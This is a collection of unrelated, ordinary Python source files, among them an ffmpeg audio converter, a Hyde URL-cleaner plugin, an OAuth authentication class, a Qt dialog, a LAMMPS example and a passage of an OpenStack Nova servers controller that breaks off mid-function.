self.message = "Error while converting file " + fname + "\nffmpeg exited with status " + str(status) + "\n" + output
def get_bitrate(filename):
parser = FFprobeParser(filename)
bitrate = parser.get("audio", "bit_rate")
del parser
if bitrate is None:
raise GettingBitrateError(filename)
else:
return bitrate // 1000
def convert(filename, output_extension, bitrate, delete_after=False):
tmpfile = tmp.getTempFileName()
command = ffmpeg_command % {"input": re.escape(filename), "bitrate": bitrate, "output": re.escape(tmpfile)}
status, output = getstatusoutput(command)
if status > 0:
tmp.remove(tmpfile)
raise ConversionError(filename, status, output)
else:
if delete_after:
os.remove(filename)
shutil.move(tmpfile, os.path.splitext(filename)[0] + output_extension)
tmp.remove(tmpfile)
# thread-safe iterating over generators
class LockedIterator(object):
def __init__(self, it):
self.lock = threading.Lock()
self.it = it.__iter__()
def __iter__(self):
return self
def __next__(self):
self.lock.acquire()
try:
return next(self.it)
finally:
self.lock.release()
class Main():
def __init__(self, args):
self.countAudioFiles = 0
self.countHigherBitrate = 0
self.countDifferentFormat = 0
self.countErrors = 0
self.countNonAudioFiles = 0
self.dry_run = args.dry_run
self.bitrate = args.bitrate
self.verbose = args.verbose
self.recursive = args.recursive
self.deleteAfter = args.delete_after
self.outputExtension = "." + args.output_extension
self.paths = args.path
try:
self.threads = cpu_count()
except NotImplementedError:
print("Unable to determine number of CPU cores, assuming one.")
self.threads = 1
self.killed = threading.Event()
self.threadsFinished = 0
self.queue = LockedIterator(self.queue_generator())
def print_stats(self):
print()
print("-----------collected statistics-----------")
print("All audio files (without errors): % 6d" % self.countAudioFiles)
print("Converted files: % 6d" % (self.countDifferentFormat + self.countHigherBitrate))
print(" - different format: % 6d" % self.countDifferentFormat)
print(" - %3s but higher bitrate: % 6d" % (self.outputExtension[1:], self.countHigherBitrate))
print("Errors: % 6d" % self.countErrors)
print("Non-audio files: % 6d" % self.countNonAudioFiles)
print("------------------------------------------")
def check(self, path):
match = re.match(audio_file_regex, path)
if not match:
self.countNonAudioFiles += 1
return False
filename = match.group("filename")
ext = match.group("extension")
self.countAudioFiles += 1
if ext != self.outputExtension:
self.countDifferentFormat += 1
return True
bitrate = get_bitrate(path)
if self.verbose > 0:
sys.stdout.write("% 3s kb/s: %s\n" % (bitrate, filename))
if bitrate > self.bitrate:
self.countHigherBitrate += 1
return True
return False
def run(self):
for i in range(self.threads):
t = threading.Thread(target=self.worker, args=(i + 1,))
t.start()
try:
while self.threadsFinished < self.threads:
sleep(0.5)
except (KeyboardInterrupt, SystemExit):
self.killed.set()
self.print_stats()
def worker(self, id):
try:
while not self.killed.is_set():
i = next(self.queue)
i = os.path.abspath(i)
try:
# check bitrate/filetype etc., skip if conversion not necessary
if not self.check(i) or self.dry_run:
continue
convert(i, self.outputExtension, self.bitrate, self.deleteAfter)
except ConversionError as e:
msg = "ERROR: failed to convert file '%s'\n" % i
if self.verbose > 0:
msg += e.message + "\n"
sys.stdout.write(msg)
self.countErrors += 1
except GettingBitrateError as e:
msg = "ERROR: failed to get bitrate from file '%s'" % i
if self.verbose > 0:
msg += e.message + "\n"
sys.stdout.write(msg)
self.countErrors += 1
else:
sys.stdout.write("Thread % 2d: %s\n" % (id, i))
except StopIteration:
pass
finally:
self.threadsFinished += 1
def queue_generator(self):
""" For each directory in self.files returns generator returning full paths to mp3 files in that folder.
If self.files contains file paths instead of directory, it's returned as [file].
"""
def walk(root):
dirs = []
files = []
for entry in scandir.scandir(root):
if entry.is_dir():
dirs.append(entry.name)
elif entry.is_file():
files.append(entry.name)
# first yield found files, then recurse into subdirs
for f in files:
yield os.path.join(root, f)
if self.recursive:
for d in dirs: # recurse into subdir
for f in walk(os.path.join(root, d)):
yield f
for path in self.paths:
if os.path.isdir(path):
for f in walk(path):
yield f
else:
yield path
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="convert all audio files in given folder (recursively) to specified bitrate, skip if bitrate is less or equal")
parser.add_argument("path", action="store", nargs="+", help="path to file(s) to convert - filename or directory")
parser.add_argument("-r", "--recursive", action="store_true", help="browse folders recursively")
parser.add_argument("--dry-run", action="store_true", help="don't convert, only print stats")
parser.add_argument("-b", "--bitrate", action="store", type=int, metavar="BITRATE", default="128", help="set bitrate - in kb/s, default=128")
parser.add_argument("-v", "--verbose", action="count", default=0, help="set verbosity level")
parser.add_argument("--delete-after", action="store_true", help="delete old files after conversion")
parser.add_argument("--output-extension", choices=audio_types, type=str, default="mp3", help="set output extension")
args = parser.parse_args()
tmp = TempFiles()
main = Main(args)
main.run()
|
# -*- coding: utf-8 -*-
"""
Contains classes and utilities related to hyde urls.
"""
from hyde.plugin import Plugin
from hyde.site import Site
from functools import wraps
from fswrap import File
class UrlCleanerPlugin(Plugin):
"""
Url Cleaner plugin for hyde. Adds to hyde the ability to generate clean
urls.
Configuration example
---------------------
#yaml
urlcleaner:
index_file_names:
# Identifies the files that represents a directory listing.
# These file names are automatically stripped away when
# the content_url function is called.
- index.html
strip_extensions:
# The following extensions are automatically removed when
# generating the urls using content_url function.
- html
# This option will append a slash to the end of directory paths
append_slash: true
"""
def __init__(self, site):
super(UrlCleanerPlugin, self).__init__(site)
def begin_site(self):
"""
Replace the content_url method in the site object with a custom method
that cleans urls based on the given configuration.
"""
config = self.site.config
if not hasattr(config, 'urlcleaner'):
return
if (hasattr(Site, '___url_cleaner_patched___')):
return
settings = config.urlcleaner
def clean_url(urlgetter):
@wraps(urlgetter)
def wrapper(site, path, safe=None):
url = urlgetter(site, path, safe)
index_file_names = getattr(settings,
'index_file_names',
['index.html'])
rep = File(url)
if rep.name in index_file_names:
url = rep.parent.path.rstrip('/')
if hasattr(settings, 'append_slash') and \
settings.append_slash:
url += '/'
elif hasattr(settings, 'strip_extensions'):
if rep.kind in settings.strip_extensions:
url = rep.parent.child(rep.name_without_extension)
return url or '/'
return wrapper
Site.___url_cleaner_patched___ = True
Site.content_url = clean_url(Site.content_url)
|
from functools import partial
import commonware.log
import jingo
from piston.authentication.oauth import OAuthAuthentication, views
from django.contrib.auth.models import AnonymousUser
from access.middleware import ACLMiddleware
from users.models import UserProfile
from zadmin import jinja_for_django
# This allows the views in piston.authentication.oauth to cope with
# Jinja2 templates as opposed to Django templates.
# Piston view passes: template, context, request_context
jfd = lambda a, b, c: jinja_for_django(a, b, context_instance=c)
views.render_to_response = jfd
log = commonware.log.getLogger('z.api')
class AMOOAuthAuthentication(OAuthAuthentication):
"""^^^MOO!!! Adds amo_user to the request object."""
def is_authenticated(self, request):
if request.user and request.user.is_authenticated():
return True
# To avoid patching django-piston, use a partial to cope with
# piston not sending in request when called later.
self.challenge = partial(self._challenge, request=request)
# Authenticate the user using Piston, rv will be True or False
# depending upon how it went.
rv = super(AMOOAuthAuthentication, self).is_authenticated(request)
if rv and request.user:
# The user is there, but we need to alter the user to be
# a user specified in the request. Specifically chose this
# term to avoid conflict with user, which could be used elsewhere.
if self.two_legged and 'authenticate_as' in request.REQUEST:
pk = request.REQUEST.get('authenticate_as')
try:
profile = UserProfile.objects.get(pk=pk)
except UserProfile.DoesNotExist:
log.warning('Cannot find user: %s' % pk)
return False
if profile.deleted or profile.confirmationcode:
log.warning('Tried to use deleted or unconfirmed user: %s'
% pk)
return False
log.info('Authenticating as: %s' % pk)
request.user = profile.user
# If that worked and request.user got set, setup AMO specific bits.
ACLMiddleware().process_request(request)
else:
# The piston middleware could find a consumer, but no
# user on that consumer. If it does it returns True, but
# request.user is None, which then blows up other things.
request.user = AnonymousUser()
return False
return rv
def _challenge(self, request):
response = jingo.render(request, 'piston/oauth/challenge.html',
status=401)
response['WWW-Authenticate'] = 'OAuth realm="API"'
return response
|
# -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2008, 2010, 2011 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Search engine CVifier, generating CVs for record collections in LaTeX, html, and plaintext formats.
The main API is cvify_records().
"""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
from invenio.bibformat import format_records
from invenio.config import CFG_SITE_SUPPORT_EMAIL
import invenio.template
websearch_templates = invenio.template.load('websearch')
def cvify_records(recids, of, req=None, so='d'):
"""
Write a CV for records RECIDS in the format OF in language LN.
REQ is the Apache/mod_python request object.
"""
# intbitsets don't support indexing, so we need a list from our hitset first
recids = [hit for hit in recids]
if so == 'd':
recids.reverse()
if of.startswith('h'):
if of == 'hcv':
format_records(recids, of=of,
record_prefix=lambda count: '%d) ' % (count+1),
req=req)
elif of == 'htcv':
format_records(recids, of=of,
record_prefix=lambda count: '%d) ' % (count+1),
req=req)
elif of == 'tlcv':
HEADER = r'''
\documentclass{article}
%%To use pdflatex, uncomment these lines, as well as the \href lines
%%in each entry
%%\usepackage[pdftex,
%% colorlinks=true,
%% urlcolor=blue, %% \href{...}{...} external (URL)
%% filecolor=green, %% \href{...} local file
%% linkcolor=red, %% \ref{...} and \pageref{...}
%% pdftitle={Papers by AUTHOR},
%% pdfauthor={Your Name},
%% pdfsubject={Just a test},
%% pdfkeywords={test testing testable},
%% pagebackref,
%% pdfpagemode=None,
%% bookmarksopen=true]{hyperref}
%%usepackage{arial}
%%\renewcommand{\familydefault}{\sfdefault} %% San serif
\renewcommand{\labelenumii}{\arabic{enumi}.\arabic{enumii}}
\pagestyle{empty}
\oddsidemargin 0.0in
\textwidth 6.5in
\topmargin -0.75in
\textheight 9.5in
\begin{document}
\title{Papers by AUTHOR}
\author{}
\date{}
\maketitle
\begin{enumerate}
%%%% LIST OF PAPERS
%%%% Please comment out anything between here and the
%%%% first \item
%%%% Please send any updates or corrections to the list to
%%%% %(email)s
''' % { 'email' : CFG_SITE_SUPPORT_EMAIL, }
FOOTER = r'''
\end{enumerate}
\end{document}
'''
format_records(recids, of=of,
prologue=HEADER,
epilogue=FOOTER,
req=req)
return ''
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
FILTER_COEFF = [
-845859, -459003, -573589, -703227, -848199, -1008841,
-1183669, -1372046, -1573247, -1787578, -2011503, -2243311,
-2482346, -2723079, -2964681, -3202200, -3432186, -3650186,
-3851924, -4032122, -4185340, -4306430, -4389146, -4427786,
-4416716, -4349289, -4220031, -4022692, -3751740, -3401468,
-2966915, -2443070, -1825548, -1110759, -295281, 623307,
1646668, 2775970, 4011152, 5351560, 6795424, 8340274,
9982332, 11717130, 13539111, 15441640, 17417389, 19457954,
21554056, 23695744, 25872220, 28072119, 30283431, 32493814,
34690317, 36859911, 38989360, 41065293, 43074548, 45004087,
46841170, 48573558, 50189545, 51678076, 53028839, 54232505,
55280554, 56165609, 56881415, 57422788, 57785876, 57968085,
57968084, 57785876, 57422788, 56881415, 56165609, 55280554,
54232505, 53028839, 51678076, 50189545, 48573558, 46841170,
45004087, 43074548, 41065293, 38989360, 36859911, 34690317,
32493814, 30283431, 28072119, 25872220, 23695744, 21554057,
19457953, 17417389, 15441640, 13539111, 11717130, 9982332,
8340274, 6795424, 5351560, 4011152, 2775970, 1646668,
623307, -295281, -1110759, -1825548, -2443070, -2966915,
-3401468, -3751740, -4022692, -4220031, -4349289, -4416715,
-4427787, -4389146, -4306430, -4185340, -4032122, -3851924,
-3650186, -3432186, -3202200, -2964681, -2723079, -2482346,
-2243311, -2011503, -1787578, -1573247, -1372046, -1183669,
-1008841, -848199, -703227, -573589, -459003, -845858]
from itertools import izip
def next_difficulty(history, gain, limiter):
if len(history)<2:
return 1.0
vTimeDelta = [x[0] for x in history[:145]]
vTimeDelta = [y-x for x,y in izip(vTimeDelta[:-1], vTimeDelta[1:])]
vTimeDelta.extend([600] * (144 - len(vTimeDelta)))
vTimeDelta = [x*y for x,y in izip(vTimeDelta, FILTER_COEFF)]
# TODO: remove FPU arithmetic and replace with bignums
dFilteredInterval = -sum(vTimeDelta) / 2147483648.0;
dAdjustmentFactor = 1.0 - gain * (dFilteredInterval - 600.0) / 600.0;
#print (dFilteredInterval, dAdjustmentFactor)
max_limiter = limiter
min_limiter = 1.0 / limiter
if dAdjustmentFactor > max_limiter:
dAdjustmentFactor = max_limiter
elif dAdjustmentFactor < min_limiter:
dAdjustmentFactor = min_limiter
return history[0][1] * dAdjustmentFactor
from random import expovariate
def simulate(start, end, nethash, interval=72, gain=0.18, limiter=2.0):
blocks = []
time = start
while time < end:
if not len(blocks)%interval:
nd = next_difficulty(blocks[:-146:-1], gain, limiter)
blocks.append( (round(time), nd) )
nh = nethash(time)
time += expovariate(1.0 / (600.0 * nd / nh))
#print (nd, nh, time)
return blocks
from bisect import bisect_left
def smooth(history, window=16):
# Sort the history by time, so that we don't have any negative block
# times. Not ideal, but allows us to avoid possible instability in the
# simulator.
history = [(int(n),int(t),float(d))
for t,n,d in sorted((t,n,d) for n,t,d in history)]
diff = []
for idx in xrange(2, len(history)-1):
offset = min(idx-1, window, len(history)-1-idx)
interval = (history[idx + offset][1] -
history[idx - offset][1]) / (2.0 * offset + 1)
diff.append((history[idx][1], history[idx][2]*600.0/interval))
def nethash(time):
if time > diff[-1][0]:
return diff[-1][1]
return diff[bisect_left(diff, (time, 1.0))][1]
return nethash
from csv import reader
def history_from_csv(filename):
with open(filename, 'r') as csvfile:
return [(int(n),int(t),float(d)) for n,t,d in reader(csvfile)]
def utility_function(blocks):
# Calculate root-mean-square difference from a straight-line
# approximation
l = len(blocks)
b = sum(t for t,d in blocks)/l - 300.0*l
e = sum((600.0*n+b - t)**2 for n,(t,d) in enumerate(blocks))/l
return e**0.5
def xfrange(x, y, step):
while x < y:
yield x
x += step
if __name__ == '__main__':
frc = history_from_csv('frc.csv')
print(u"VertiCoin historical error: %f" % utility_function([(t,d) for n,t,d in frc]))
btc = history_from_csv('btc.csv')
print(u"Bitcoin historical error: %f" % utility_function([(t,d) for n,t,d in btc]))
smoothed = smooth(btc)
print(u"w=12,G=0.15")
fp = open('out.csv', 'w')
for l in xfrange(1.0175, 1.25, 0.0025):
#for I in xrange(1, 73):
blks = simulate(btc[0][1], btc[-1][1], smoothed, interval=12, gain=0.15, limiter=l)
quality = (l, utility_function(blks))
print(u"l=%f: %f" % quality)
fp.write("%f,%f\n" % quality)
fp.close()
#
# End of File
#
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from qframer.qt.QtCore import *
from qframer.qt.QtGui import *
def set_skin(widget, qssfile):
if os.path.exists(qssfile):
fd = open(qssfile, "r")
style = fd.read()
fd.close()
widget.setStyleSheet(style)
class BaseDialog(QDialog):
def __init__(self, styleoptions, parent=None):
super(BaseDialog, self).__init__(parent)
title = styleoptions['title']
windowicon = styleoptions['windowicon']
minsize = styleoptions['minsize']
size = styleoptions['size']
logo_title = styleoptions['logo_title']
logo_img_url = styleoptions['logo_img_url']
self.setWindowTitle(title)
self.setWindowIcon(QIcon(windowicon)) # 设置程序图标
self.setMinimumSize(minsize[0], minsize[1])
self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowSystemMenuHint |
Qt.WindowMinimizeButtonHint) # 无边框, 带系统菜单, 可以最小化
self.logowidget = DynamicTextWidget(logo_title, logo_img_url)
# 主布局
mainlayout = QVBoxLayout()
mainlayout.addWidget(self.logowidget)
mainlayout.setContentsMargins(5, 5, 5, 5)
mainlayout.setSpacing(0)
self.setLayout(mainlayout)
self.resize(size[0], size[1])
def mousePressEvent(self, event):
# 鼠标点击事件
if event.button() == Qt.LeftButton:
self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()
event.accept()
def mouseReleaseEvent(self, event):
# 鼠标释放事件
if hasattr(self, "dragPosition"):
del self.dragPosition
def mouseMoveEvent(self, event):
# 鼠标移动事件
if hasattr(self, "dragPosition"):
if event.buttons() == Qt.LeftButton:
self.move(event.globalPos() - self.dragPosition)
event.accept()
class DynamicTextWidget(QWidget):
def __init__(self, text, bg, parent=None):
super(DynamicTextWidget, self).__init__(parent)
self.setFixedSize(400, 132)
self.bg = bg
self.text = text
newFont = self.font()
newFont.setPointSize(newFont.pointSize() + 10)
self.setFont(newFont)
self.painter = QPainter()
self.timer = QBasicTimer()
self.step = 0
self.timer.start(60, self)
def paintEvent(self, event):
self.painter.begin(self)
self.drawBackground(self.painter)
self.drawDynamicText(self.painter)
self.painter.end()
def set_painterpencolor(self, painter):
color = QColor()
import random
i = random.randint(1, 15)
color.setHsv((15 - i) * 16, 255, 191)
painter.setPen(color)
def drawBackground(self, painter):
painter.drawPixmap(0, 0, self.width(), self.height(), QPixmap(self.bg))
def drawDynamicText(self, painter):
sineTable = (0, 38, 71, 92, 100, 92, 71, 38, 0, -38, -71, -92, -100, -
92, -71, -38)
metrics = QFontMetrics(self.font())
x = (self.width() - metrics.width(self.text)) / 2
y = (self.height() + metrics.ascent() - metrics.descent()) / 2
color = QColor()
for i, ch in enumerate(self.text):
index = (self.step + i) % 16
color.setHsv((15 - index) * 16, 255, 191)
painter.setPen(color)
painter.drawText(x, y -
((sineTable[index] * metrics.height()) / 400), ch)
x += metrics.width(ch)
def setText(self, newText):
self.text = newText
def setspreed(self, spreed):
self.spreed = spreed
self.timer.stop()
self.timer.start(self.spreed, self)
def timerEvent(self, event):
if self.text:
if event.timerId() == self.timer.timerId():
self.step += 1
self.update()
else:
super(DynamicTextWidget, self).timerEvent(event)
else:
self.timer.stop()
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
styleoptions = {
'title': u'退出设置',
'windowicon': "../skin/images/ov-orange-green.png",
'minsize': (400, 300),
'size': (400, 300),
'logo_title': u'dssssssss',
'logo_img_url': "../skin/images/ov-orange-green.png"
}
dialog = BaseDialog(styleoptions)
dialog.show()
sys.exit(app.exec_())
|
#!/usr/bin/env python -i
# preceding line should have path for Python on your machine
# split.py
# Purpose: similar to simple.py, but first the world communicator
# is split in two halves and LAMMPS is run only on one partition
# Syntax: split.py in.lammps
# in.lammps = LAMMPS input script
from __future__ import print_function
import sys
# parse command line
argv = sys.argv
if len(argv) != 2:
print("Syntax: simple.py in.lammps")
sys.exit()
infile = sys.argv[1]
me = 0
# this example *only* works with mpi4py version 2.0.0 or later
from mpi4py import MPI
comm = MPI.COMM_WORLD
me = comm.Get_rank()
nprocs = comm.Get_size()
# create two subcommunicators
if me < nprocs // 2: color = 0
else: color = 1
split = comm.Split(color,key=0)
if color == 0:
from lammps import lammps
lmp = lammps(comm=split)
# run infile one line at a time
lines = open(infile,'r').readlines()
for line in lines: lmp.command(line)
# run 10 more steps
# get coords from LAMMPS
# change coords of 1st atom
# put coords back into LAMMPS
# run a single step with changed coords
lmp.command("run 10")
x = lmp.gather_atoms("x",1,3)
epsilon = 0.1
x[0] += epsilon
lmp.scatter_atoms("x",1,3,x)
lmp.command("run 1");
f = lmp.extract_atom("f")
print("Force on 1 atom via extract_atom: ",f[0][0])
fx = lmp.extract_variable("fx","all",1)
print("Force on 1 atom via extract_variable:",fx[0])
print("Proc %d out of %d procs has" % (me,nprocs), lmp)
print("Calculation on partition 0 complete")
else:
# could run a 2nd calculation on second partition
# with different LAMMPS instance or another code
# in this case, just sleep on second partition
import time
time.sleep(2)
print("Calculation on partition 1 complete")
# shutdown mpi4py
comm.Barrier()
MPI.Finalize()
|
from uber.common import *
@all_renderable(c.PEOPLE, c.REG_AT_CON)
class Root:
def index(self, session, message='', order='name', show='all'):
which = {
'all': [],
'tables': [Group.tables > 0],
'groups': [Group.tables == 0]
}[show]
# TODO: think about using a SQLAlchemy column property for .badges and then just use .order()
groups = sorted(session.query(Group).filter(*which).options(joinedload('attendees')).all(),
reverse=order.startswith('-'),
key=lambda g: [getattr(g, order.lstrip('-')), g.tables])
return {
'show': show,
'groups': groups,
'message': message,
'order': Order(order),
'total_groups': len(groups),
'total_badges': sum(g.badges for g in groups),
'tabled_badges': sum(g.badges for g in groups if g.tables),
'untabled_badges': sum(g.badges for g in groups if not g.tables),
'tabled_groups': len([g for g in groups if g.tables]),
'untabled_groups': len([g for g in groups if not g.tables]),
'tables': sum(g.tables for g in groups),
'unapproved_tables': sum(g.tables for g in groups if g.status == c.UNAPPROVED),
'waitlisted_tables': sum(g.tables for g in groups if g.status == c.WAITLISTED),
'approved_tables': sum(g.tables for g in groups if g.status == c.APPROVED)
}
@log_pageview
def form(self, session, new_dealer='', first_name='', last_name='', email='', message='', **params):
group = session.group(params, bools=['auto_recalc', 'can_add'])
if 'name' in params:
message = check(group)
if not message:
session.add(group)
ribbon_to_use = None if 'ribbon' not in params else params['ribbon']
message = session.assign_badges(group, params['badges'], params['badge_type'], ribbon_to_use)
if not message and new_dealer and not (first_name and last_name and email and group.badges):
message = 'When registering a new Dealer, you must enter the name and email address of the group leader and must allocate at least one badge'
if not message:
if new_dealer:
session.commit()
leader = group.leader = group.attendees[0]
leader.first_name, leader.last_name, leader.email = first_name, last_name, email
leader.placeholder = True
if group.status == c.APPROVED:
if group.amount_unpaid:
raise HTTPRedirect('../preregistration/group_members?id={}', group.id)
else:
raise HTTPRedirect('index?message={}', group.name + ' has been uploaded, approved, and marked as paid')
else:
raise HTTPRedirect('index?message={}', group.name + ' is uploaded and ' + group.status_label)
else:
raise HTTPRedirect('form?id={}&message={}', group.id, 'Group info uploaded')
return {
'group': group,
'message': message,
'new_dealer': new_dealer,
'first_name': first_name,
'last_name': last_name,
'email': email
}
@ajax
def unapprove(self, session, id, action, email):
assert action in ['waitlisted', 'declined']
group = session.group(id)
subject = 'Your {EVENT_NAME} Dealer registration has been ' + action
if group.email:
send_email(c.MARKETPLACE_EMAIL, group.email, subject, email, bcc=c.MARKETPLACE_EMAIL, model=group)
if action == 'waitlisted':
group.status = c.WAITLISTED
else:
for attendee in group.attendees:
session.delete(attendee)
session.delete(group)
session.commit()
return {'success': True}
@csrf_protected
def delete(self, session, id, confirmed=None):
group = session.group(id)
if group.badges - group.unregistered_badges and not confirmed:
raise HTTPRedirect('deletion_confirmation?id={}', id)
else:
for attendee in group.attendees:
session.delete(attendee)
session.delete(group)
raise HTTPRedirect('index?message={}', 'Group deleted')
def deletion_confirmation(self, session, id):
return {'group': session.group(id)}
@csrf_protected
def assign_leader(self, session, group_id, attendee_id):
group = session.group(group_id)
attendee = session.attendee(attendee_id)
if attendee not in group.attendees:
raise HTTPRedirect('form?id={}&message={}', group_id, 'That attendee has been removed from the group')
else:
group.leader_id = attendee_id
raise HTTPRedirect('form?id={}&message={}', group_id, 'Group leader set')
|
# Copyright 2010 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import re
import stevedore
from oslo.config import cfg
from oslo import messaging
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute.views import servers as views_servers
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.compute import flavors
from nova import exception
from nova.image import glance
from nova.objects import block_device as block_device_obj
from nova.objects import instance as instance_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import strutils
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import policy
from nova import utils
CONF = cfg.CONF
CONF.import_opt('enable_instance_password',
'nova.api.openstack.compute.servers')
CONF.import_opt('network_api_class', 'nova.network')
CONF.import_opt('reclaim_instance_interval', 'nova.compute.manager')
CONF.import_opt('extensions_blacklist', 'nova.api.openstack', group='osapi_v3')
CONF.import_opt('extensions_whitelist', 'nova.api.openstack', group='osapi_v3')
LOG = logging.getLogger(__name__)
authorizer = extensions.core_authorizer('compute:v3', 'servers')
class ServersController(wsgi.Controller):
"""The Server API base controller class for the OpenStack API."""
EXTENSION_CREATE_NAMESPACE = 'nova.api.v3.extensions.server.create'
EXTENSION_DESERIALIZE_EXTRACT_SERVER_NAMESPACE = (
'nova.api.v3.extensions.server.create.deserialize')
EXTENSION_REBUILD_NAMESPACE = 'nova.api.v3.extensions.server.rebuild'
EXTENSION_DESERIALIZE_EXTRACT_REBUILD_NAMESPACE = (
'nova.api.v3.extensions.server.rebuild.deserialize')
EXTENSION_UPDATE_NAMESPACE = 'nova.api.v3.extensions.server.update'
_view_builder_class = views_servers.ViewBuilderV3
@staticmethod
def _add_location(robj):
# Just in case...
if 'server' not in robj.obj:
return robj
link = filter(lambda l: l['rel'] == 'self',
robj.obj['server']['links'])
if link:
robj['Location'] = utils.utf8(link[0]['href'])
# Convenience return
return robj
def __init__(self, **kwargs):
def _check_load_extension(required_function):
def check_whiteblack_lists(ext):
# Check whitelist is either empty or if not then the extension
# is in the whitelist
if (not CONF.osapi_v3.extensions_whitelist or
ext.obj.alias in CONF.osapi_v3.extensions_whitelist):
# Check the extension is not in the blacklist
if ext.obj.alias not in CONF.osapi_v3.extensions_blacklist:
return True
else:
LOG.warning(_("Not loading %s because it is "
"in the blacklist"), ext.obj.alias)
return False
else:
LOG.warning(
_("Not loading %s because it is not in the whitelist"),
ext.obj.alias)
return False
def check_load_extension(ext):
if isinstance(ext.obj, extensions.V3APIExtensionBase):
# Filter out for the existence of the required
# function here rather than on every request. We
# don't have a new abstract base class to reduce
# duplication in the extensions as they may want
# to implement multiple server (and other) entry
# points if hasattr(ext.obj, 'server_create'):
if hasattr(ext.obj, required_function):
LOG.debug(_('extension %(ext_alias)s detected by '
'servers extension for function %(func)s'),
{'ext_alias': ext.obj.alias,
'func': required_function})
return check_whiteblack_lists(ext)
else:
LOG.debug(
_('extension %(ext_alias)s is missing %(func)s'),
{'ext_alias': ext.obj.alias,
'func': required_function})
return False
else:
return False
return check_load_extension
self.extension_info = kwargs.pop('extension_info')
super(ServersController, self).__init__(**kwargs)
self.compute_api = compute.API()
# Look for implementation of extension point of server creation
self.create_extension_manager = \
stevedore.enabled.EnabledExtensionManager(
namespace=self.EXTENSION_CREATE_NAMESPACE,
check_func=_check_load_extension('server_create'),
invoke_on_load=True,
invoke_kwds={"extension_info": self.extension_info},
propagate_map_exceptions=True)
if not list(self.create_extension_manager):
LOG.debug(_("Did not find any server create extensions"))
# Look for implementation of extension point of server rebuild
self.rebuild_extension_manager = \
stevedore.enabled.EnabledExtensionManager(
namespace=self.EXTENSION_REBUILD_NAMESPACE,
check_func=_check_load_extension('server_rebuild'),
invoke_on_load=True,
invoke_kwds={"extension_info": self.extension_info},
propagate_map_exceptions=True)
if not list(self.rebuild_extension_manager):
LOG.debug(_("Did not find any server rebuild extensions"))
# Look for implementation of extension point of server update
self.update_extension_manager = \
stevedore.enabled.EnabledExtensionManager(
namespace=self.EXTENSION_UPDATE_NAMESPACE,
check_func=_check_load_extension('server_update'),
invoke_on_load=True,
invoke_kwds={"extension_info": self.extension_info},
propagate_map_exceptions=True)
if not list(self.update_extension_manager):
LOG.debug(_("Did not find any server update extensions"))
def index(self, req):
"""Returns a list of server names and ids for a given user."""
try:
servers = self._get_servers(req, is_detail=False)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
def detail(self, req):
"""Returns a list of server details for a given user."""
try:
servers = self._get_servers(req, is_detail=True)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
def _get_servers(self, req, is_detail):
"""Returns a list of servers, based on any search options specified."""
search_opts = {}
search_opts.update(req.GET)
context = req.environ['nova.context']
remove_invalid_options(context, search_opts,
self._get_server_search_options())
# Verify search by 'status' contains a valid status.
# Convert it to filter by vm_state or task_state for compute_api.
status = search_opts.pop('status', None)
if status is not None:
vm_state, task_state = common.task_and_vm_state_from_status(status)
if not vm_state and not task_state:
return {'servers': []}
search_opts['vm_state'] = vm_state
# When we search by vm state, task state will return 'default'.
# So we don't need task_state search_opt.
if 'default' not in task_state:
search_opts['task_state'] = task_state
if 'changes_since' in search_opts:
try:
parsed = timeutils.parse_isotime(search_opts['changes_since'])
except ValueError:
msg = _('Invalid changes_since value')
raise exc.HTTPBadRequest(explanation=msg)
search_opts['changes_since'] = parsed
# By default, compute's get_all() will return deleted instances.
# If an admin hasn't specified a 'deleted' search option, we need
# to filter out deleted instances by setting the filter ourselves.
# ... Unless 'changes_since' is specified, because 'changes_since'
# should return recently deleted images according to the API spec.
if 'deleted' not in search_opts:
if 'changes_since' not in search_opts:
# No 'changes_since', so we only want non-deleted servers
search_opts['deleted'] = False
if 'changes_since' in search_opts:
search_opts['changes-since'] = search_opts.pop('changes_since')
if search_opts.get("vm_state") == ['deleted']:
if context.is_admin:
search_opts['deleted'] = True
else:
msg = _("Only administrators may list deleted instances")
raise exc.HTTPBadRequest(explanation=msg)
# If tenant_id is passed as a search parameter this should
# imply that all_tenants is also enabled unless explicitly
# disabled. Note that the tenant_id parameter is filtered out
# by remove_invalid_options above unless the requestor is an
# admin.
if 'tenant_id' in search_opts and not 'all_tenants' in search_opts:
# We do not need to add the all_tenants flag if the tenant
# id associated with the token is the tenant id
# specified. This is done so a request that does not need
# the all_tenants flag does not fail because of lack of
# policy permission for compute:get_all_tenants when it
# doesn't actually need it.
if context.project_id != search_opts.get('tenant_id'):
search_opts['all_tenants'] = 1
# If all tenants is passed with 0 or false as the value
# then remove it from the search options. Nothing passed as
# the value for all_tenants is considered to enable the feature
all_tenants = search_opts.get('all_tenants')
if all_tenants:
